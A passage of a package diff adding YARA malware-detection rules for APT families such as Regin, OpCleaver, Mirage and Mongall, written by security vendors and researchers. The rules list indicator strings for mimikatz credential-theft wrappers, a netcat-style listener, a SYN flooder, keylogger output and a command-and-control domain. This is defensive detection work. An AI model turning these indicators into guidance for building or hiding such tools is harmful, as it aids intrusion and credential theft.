+	
+	condition:
+		($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
+
+rule apt_hellsing_irene : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing msger irene installer"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings: 
+		$mz="MZ"
+		$a1="\\Drivers\\usbmgr.tmp" wide
+		$a2="\\Drivers\\usbmgr.sys" wide
+		$a3="common_loadDriver CreateFile error! " 
+		$a4="common_loadDriver StartService error && GetLastError():%d! " 
+		$a5="irene" wide
+		$a6="aPLib v0.43 - the smaller the better" 
+
+	condition:
+		($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_Hikit.yara remnux-rules-0.0.4/yara.old/APT_Hikit.yara
--- remnux-rules-0.0.3/yara.old/APT_Hikit.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_Hikit.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,16 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_Hikit_msrv
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$m = {6D 73 72 76 2E 64 6C 6C 00 44 6C 6C}
+condition:
+	any of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_Kaba.yara remnux-rules-0.0.4/yara.old/APT_Kaba.yara
--- remnux-rules-0.0.3/yara.old/APT_Kaba.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_Kaba.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule rtf_Kaba_jDoe
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "APT.Kaba"
+	filetype = "RTF"
+	version = "0.1"
+	description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"
+	date = "2013-12-10"
+strings:
+  	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+  	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+  	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+  	$author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"
+  	$author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"
+	$string1 = { 44 30 [16] 43 46 [23] 31 31 45 }
+condition:
+  	($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1
+} 
diff -Nru remnux-rules-0.0.3/yara.old/APT_Mirage.yara remnux-rules-0.0.4/yara.old/APT_Mirage.yara
--- remnux-rules-0.0.3/yara.old/APT_Mirage.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_Mirage.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MirageStrings : Mirage Family
+{
+    meta:
+        description = "Mirage Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "Neo,welcome to the desert of real." wide ascii
+        $ = "/result?hl=en&id=%s"
+        
+    condition:
+       any of them
+}
+
+rule Mirage : Family
+{
+    meta:
+        description = "Mirage"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        MirageStrings
+}
+
+rule Mirage_APT : APT Backdoor Rat
+{
+    meta:
+        Author      = "Silas Cutler"
+        Date        = "yyyy/mm/dd"
+        Description = "Malware related to APT campaign"
+        Reference   = "Useful link"
+    
+    strings:
+        $a1 = "welcome to the desert of the real"
+        $a2 = "Mirage"
+        $b = "Encoding: gzip"
+        $c = /\/[A-Za-z]*\?hl=en/
+
+    condition: 
+        (($a1 or $a2) or $b) and $c
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_Mongall.yara remnux-rules-0.0.4/yara.old/APT_Mongall.yara
--- remnux-rules-0.0.3/yara.old/APT_Mongall.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_Mongall.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,68 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Backdoor_APT_Mongal
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Backdoor.APT.Mongall"
+	version = "0.1"
+	reference = "fd69a799e21ccb308531ce6056944842" 
+	date = "01/04/2014"
+strings:
+	$author  = "author user"
+	$title   = "title Vjkygdjdtyuj" nocase
+	$comp    = "company ooo"
+	$cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10"
+	$passwd  = "password 00000000"
+condition:
+        all of them
+}
+
+rule MongalCode : Mongal Family 
+{
+    meta:
+        description = "Mongal code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+    
+    strings:
+        // gettickcount value checking
+        $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB }
+        
+    condition:
+        any of them
+}
+
+rule MongalStrings : Mongal Family
+{
+    meta:
+        description = "Mongal Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+        
+    strings:
+        $ = "NSCortr.dll"
+        $ = "NSCortr1.dll"
+        $ = "Sina.exe"
+        
+    condition:
+        any of them
+}
+
+rule Mongal : Family
+{
+    meta:
+        description = "Mongal"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+        
+    condition:
+        MongalCode or MongalStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/APT_NGO_wuaclt.yara remnux-rules-0.0.4/yara.old/APT_NGO_wuaclt.yara
--- remnux-rules-0.0.3/yara.old/APT_NGO_wuaclt.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_NGO_wuaclt.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,39 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_NGO_wuaclt
+{
+   meta:
+    author = "AlienVault Labs"
+  strings:
+    $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat"
+    $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+    $c = "/news/show.asp?id%d=%d"
+    
+	$d = "%%APPDATA%%\\Microsoft\\wuauclt\\"
+	$e = "0l23kj@nboxu"
+	
+	$f = "%%s.asp?id=%%d&Sid=%%d"
+	$g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)"
+	$h = "Cookies: UseID=KGIOODAOOK%%s"
+
+  condition:
+    ($a and $b and $c) or ($d and $e) or ($f and $g and $h)
+}
+
+rule APT_NGO_wuaclt_PDF
+{
+    	meta:
+        	author = "AlienVault Labs"
+
+	strings:
+		$pdf  = "%PDF" nocase
+		$comment = {3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A}
+	
+	condition:
+		$pdf at 0 and $comment in (0..200)
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_OPCleaver.yara remnux-rules-0.0.4/yara.old/APT_OPCleaver.yara
--- remnux-rules-0.0.3/yara.old/APT_OPCleaver.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_OPCleaver.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,279 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ZhoupinExploitCrew
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+  	$s1 = "zhoupin exploit crew" nocase
+    $s2 = "zhopin exploit crew" nocase
+  condition:
+  	1 of them
+}
+
+rule BackDoorLogger
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "BackDoorLogger"
+    $s2 = "zhuAddress"
+  condition:
+    all of them
+}
+
+rule Jasus
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "pcap_dump_open"
+    $s2 = "Resolving IPs to poison..."
+    $s3 = "WARNNING: Gateway IP can not be found"
+  condition:
+    all of them
+}
+
+rule LoggerModule
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "%s-%02d%02d%02d%02d%02d.r"
+    $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+  condition:
+    all of them
+}
+
+rule NetC
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "NetC.exe" wide
+    $s2 = "Net Service"
+  condition:
+    all of them
+}
+
+rule ShellCreator2
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "ShellCreator2.Properties"
+    $s2 = "set_IV"
+  condition:
+    all of them
+}
+
+rule SmartCopy2
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "SmartCopy2.Properties"
+    $s2 = "ZhuFrameWork"
+  condition:
+    all of them
+}
+
+rule SynFlooder
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+    $s2 = "your target's IP is : %s"
+    $s3 = "Raw TCP Socket Created successfully."
+  condition:
+    all of them
+}
+
+rule TinyZBot
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "NetScp" wide
+    $s2 = "TinyZBot.Properties.Resources.resources"
+
+    $s3 = "Aoao WaterMark"
+    $s4 = "Run_a_exe"
+    $s5 = "netscp.exe"
+
+    $s6 = "get_MainModule_WebReference_DefaultWS"
+    $s7 = "remove_CheckFileMD5Completed"
+    $s8 = "http://tempuri.org/"
+
+    $s9 = "Zhoupin_Cleaver"
+  condition:
+    ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9)
+}
+
+rule antivirusdetector
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+	strings:
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
+	condition:
+		all of them
+}
+
+rule csext
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "COM+ System Extentions"
+    $s2 = "csext.exe"
+    $s3 = "COM_Extentions_bin"
+  condition:
+    all of them
+}
+
+rule kagent
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "kill command is in last machine, going back"
+    $s2 = "message data length in B64: %d Bytes"
+  condition:
+    all of them
+}
+
+rule mimikatzWrapper
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "mimikatzWrapper"
+    $s2 = "get_mimikatz"
+  condition:
+    all of them
+}
+
+rule pvz_in
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "LAST_TIME=00/00/0000:00:00PM$"
+    $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+  condition:
+    all of them
+}
+
+rule pvz_out
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "Network Connectivity Module" wide
+    $s2 = "OSPPSVC" wide
+  condition:
+    all of them
+}
+
+rule wndTest
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "[Alt]" wide
+    $s2 = "<< %s >>:" wide
+    $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+  condition:
+    all of them
+}
+
+rule zhCat
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "zhCat -l -h -tp 1234"
+    $s2 = "ABC ( A Big Company )" wide
+  condition:
+    all of them
+}
+
+rule zhLookUp
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "zhLookUp.Properties"
+  condition:
+    all of them
+}
+
+rule zhmimikatz
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "MimikatzRunner"
+    $s2 = "zhmimikatz"
+  condition:
+    all of them
+}
+
+rule Zh0uSh311
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+  	$s1 = "Zh0uSh311"
+  condition:
+  	all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_pcclient.yara remnux-rules-0.0.4/yara.old/APT_pcclient.yara
--- remnux-rules-0.0.3/yara.old/APT_pcclient.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_pcclient.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,27 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule backdoor_apt_pcclient
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "APT.PCCLient"
+	filetype = "DLL"
+	version = "0.1"
+	description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)"
+	date = "2012-10"
+strings:
+	$magic = { 4d 5a } // MZ
+	$string1 = "www.micro1.zyns.com"
+	$string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
+	$string3 = "msacm32.drv" wide
+	$string4 = "C:\\Windows\\Explorer.exe" wide
+	$string5 = "Elevation:Administrator!" wide
+	$string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb"
+condition:
+	$magic at 0 and 4 of ($string*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_Regin.yara remnux-rules-0.0.4/yara.old/APT_Regin.yara
--- remnux-rules-0.0.3/yara.old/APT_Regin.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_Regin.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,407 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule Regin_APT_KernelDriver_Generic_A {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash2 = "06665b96e293b23acc80451abb413e50"
+		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		
+		$s0 = "atapi.sys" fullword wide
+		$s1 = "disk.sys" fullword wide
+		$s3 = "h.data" fullword ascii
+		$s4 = "\\system32" fullword ascii
+		$s5 = "\\SystemRoot" fullword ascii
+		$s6 = "system" fullword ascii
+		$s7 = "temp" fullword ascii
+		$s8 = "windows" fullword ascii
+
+		$x1 = "LRich6" fullword ascii
+		$x2 = "KeServiceDescriptorTable" fullword ascii		
+	condition:
+		$m0 at 0 and $m1 and  	
+		all of ($s*) and 1 of ($x*)
+}
+
+rule Regin_APT_KernelDriver_Generic_B {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
+		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
+		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
+		hash4 = "06665b96e293b23acc80451abb413e50"
+		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
+		hash6 = "4b6b86c7fec1c574706cecedf44abded"
+		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
+		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
+		hash10 = "1c024e599ac055312a4ab75b3950040a"
+		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
+		hash12 = "b505d65721bb2453d5039a389113b566"
+		hash13 = "b269894f434657db2b15949641a67532"
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		$s2 = "H.data" fullword ascii nocase
+		$s3 = "INIT" fullword ascii
+		$s4 = "ntoskrnl.exe" fullword ascii
+		
+		$v1 = "\\system32" fullword ascii
+		$v2 = "\\SystemRoot" fullword ascii
+		$v3 = "KeServiceDescriptorTable" fullword ascii	
+		
+		$w1 = "\\system32" fullword ascii
+		$w2 = "\\SystemRoot" fullword ascii		
+		$w3 = "LRich6" fullword ascii
+		
+		$x1 = "_snprintf" fullword ascii
+		$x2 = "_except_handler3" fullword ascii
+		
+		$y1 = "mbstowcs" fullword ascii
+		$y2 = "wcstombs" fullword ascii
+		$y3 = "KeGetCurrentIrql" fullword ascii
+		
+		$z1 = "wcscpy" fullword ascii
+		$z2 = "ZwCreateFile" fullword ascii
+		$z3 = "ZwQueryInformationFile" fullword ascii
+		$z4 = "wcslen" fullword ascii
+		$z5 = "atoi" fullword ascii
+	condition:
+		$m0 at 0 and all of ($s*) and 
+		( all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*) ) 
+		and filesize < 20KB
+}
+
+rule Regin_APT_KernelDriver_Generic_C {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
+		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"		
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+	
+		$s0 = "KeGetCurrentIrql" fullword ascii
+		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
+		$s2 = "usbclass" fullword wide
+		
+		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
+		$x2 = "Universal Serial Bus Class Driver" fullword wide
+		$x3 = "5.2.3790.0" fullword wide
+		
+		$y1 = "LSA Shell" fullword wide
+		$y2 = "0Richw" fullword ascii		
+	condition:
+		$m0 at 0 and all of ($s*) and 
+		( all of ($x*) or all of ($y*) ) 
+		and filesize < 20KB
+}
+
+/* Update 27.11.14 */
+
+rule Regin_sig_svcsstat {
+	meta:
+		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
+	strings:
+		$s0 = "Service Control Manager" fullword ascii
+		$s1 = "_vsnwprintf" fullword ascii
+		$s2 = "Root Agency" fullword ascii
+		$s3 = "Root Agency0" fullword ascii
+		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
+		$s5 = "\\\\?\\UNC" fullword wide
+		$s6 = "%ls%ls" fullword wide
+	condition:
+		all of them and filesize < 15KB and filesize > 10KB 
+}
+
+rule Regin_Sample_1 {
+	meta:
+		description = "Auto-generated rule - file-3665415_sys"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
+	strings:
+		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
+		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
+		$s2 = "External Naming Failed - Status %x" fullword ascii
+		$s3 = "------- Same multiport - different interrupts" fullword ascii
+		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
+		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
+		$s6 = "Could not report legacy device - %x" fullword ascii
+		$s7 = "entering SerialGetPortInfo" fullword ascii
+		$s8 = "'user registry info - userPort: %x" fullword ascii
+		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
+		$s10 = "Kernel debugger is using port at address %X" fullword ascii
+		$s12 = "Release - freeing multi context" fullword ascii
+		$s13 = "Serial driver will not load port" fullword ascii
+		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
+		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
+		$s20 = "'user registry info - userIndexed: %d" fullword ascii
+	condition:
+		all of them and filesize < 110KB and filesize > 80KB
+}
+
+rule Regin_Sample_2 {
+	meta:
+		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
+	strings:
+		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" fullword wide
+		$s1 = "atapi.sys" fullword wide
+		$s2 = "disk.sys" fullword wide
+		$s3 = "IoGetRelatedDeviceObject" fullword ascii
+		$s4 = "HAL.dll" fullword ascii
+		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" fullword ascii
+		$s6 = "PsGetCurrentProcessId" fullword ascii
+		$s7 = "KeGetCurrentIrql" fullword ascii
+		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s9 = "KeSetImportanceDpc" fullword ascii
+		$s10 = "KeQueryPerformanceCounter" fullword ascii
+		$s14 = "KeInitializeEvent" fullword ascii
+		$s15 = "KeDelayExecutionThread" fullword ascii
+		$s16 = "KeInitializeTimerEx" fullword ascii
+		$s18 = "PsLookupProcessByProcessId" fullword ascii
+		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
+		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
+	condition:
+		all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_3 {
+	meta:
+		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+		author = "@Malwrsignatures"
+		date = "27.11.14"
+		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"		
+	strings:
+		$hd = { fe ba dc fe }
+	
+		$s0 = "Service Pack x" fullword wide
+		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
+		$s3 = "mntoskrnl.exe" fullword wide
+		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" fullword wide
+		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
+		$s6 = "Service Pack" fullword wide
+		$s7 = ".sys" fullword wide
+		$s8 = ".dll" fullword wide		
+		
+		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" fullword wide
+		$s11 = "IoGetRelatedDeviceObject" fullword ascii
+		$s12 = "VMEM.sys" fullword ascii
+		$s13 = "RtlGetVersion" fullword wide
+		$s14 = "ntkrnlpa.exe" fullword ascii
+	condition:
+		( $hd at 0 ) and all of ($s*) and filesize > 160KB and filesize < 200KB
+}
+
+rule Regin_Sample_Set_1 {
+	meta:
+		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
+		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"		
+	strings:
+		$s0 = "HAL.dll" fullword ascii
+		$s1 = "IoGetDeviceObjectPointer" fullword ascii
+		$s2 = "MaximumPortsServiced" fullword wide
+		$s3 = "KeGetCurrentIrql" fullword ascii
+		$s4 = "ntkrnlpa.exe" fullword ascii
+		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s6 = "ConnectMultiplePorts" fullword wide
+		$s7 = "\\SYSTEMROOT" fullword wide
+		$s8 = "IoWriteErrorLogEntry" fullword ascii
+		$s9 = "KeQueryPerformanceCounter" fullword ascii
+		$s10 = "KeServiceDescriptorTable" fullword ascii
+		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
+		$s12 = "SeSinglePrivilegeCheck" fullword ascii
+		$s13 = "KeInitializeEvent" fullword ascii
+		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
+		$s15 = "KeRemoveDeviceQueue" fullword ascii
+		$s16 = "IofCompleteRequest" fullword ascii
+		$s17 = "KeInitializeSpinLock" fullword ascii
+		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
+		$s19 = "IoCreateDevice" fullword ascii
+		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
+	condition:
+		all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_Set_2 {
+	meta:
+		description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+		author = "@MalwrSignatures"
+		date = "27.11.14"
+		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
+		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+	strings:
+		$hd = { fe ba dc fe }
+	
+		$s0 = "d%ls%ls" fullword wide
+		$s1 = "\\\\?\\UNC" fullword wide
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
+		$s3 = "\\\\?\\UNC\\" fullword wide
+		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
+		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
+		$s6 = "\\\\.\\Global\\%s" fullword wide
+		$s7 = "temp" fullword wide
+		$s8 = "\\\\.\\%s" fullword wide
+		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide		
+		
+		$s10 = "sscanf" fullword ascii
+		$s11 = "disp.dll" fullword ascii
+		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+		$s13 = "%d.%d.%d.%d%c" fullword ascii
+		$s14 = "imagehlp.dll" fullword ascii
+		$s15 = "%hd %d" fullword ascii
+	condition:
+		( $hd at 0 ) and all of ($s*) and filesize < 450KB and filesize > 360KB
+}
+
+rule apt_regin_legspin {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect Regin's Legspin module"
+	    version = "1.0"
+	    last_modified = "2015-01-22"
+	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+	    md5 = "29105f46e4d33f66fee346cfd099d1cc"
+	strings:
+	    $mz="MZ"
+	    $a1="sharepw"
+	    $a2="reglist"
+	    $a3="logdump"
+	    $a4="Name:" wide
+	    $a5="Phys Avail:"
+	    $a6="cmd.exe" wide
+	    $a7="ping.exe" wide
+	    $a8="millisecs"
+	condition:
+	    ($mz at 0) and all of ($a*)
+}
+
+rule apt_regin_hopscotch {
+	meta:
+	    copyright = "Kaspersky Lab"
